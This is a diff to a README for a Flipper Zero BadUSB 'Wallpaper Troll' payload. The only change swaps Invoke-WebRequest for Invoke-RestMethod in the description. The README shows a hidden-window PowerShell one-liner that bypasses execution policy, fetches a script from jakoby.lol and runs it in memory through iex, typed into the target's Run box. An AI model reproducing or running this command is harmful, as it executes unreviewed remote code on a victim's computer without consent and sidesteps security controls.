I-Am-Jakoby/Flipper-Zero-BadUSB/Payloads/Flip-Wallpaper-Troll/README.md

 ### Executing program

 * Plug in your device
-* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* Invoke-RestMethod will be entered in the Run Box to download and execute the script from memory
 ```
 powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
 ```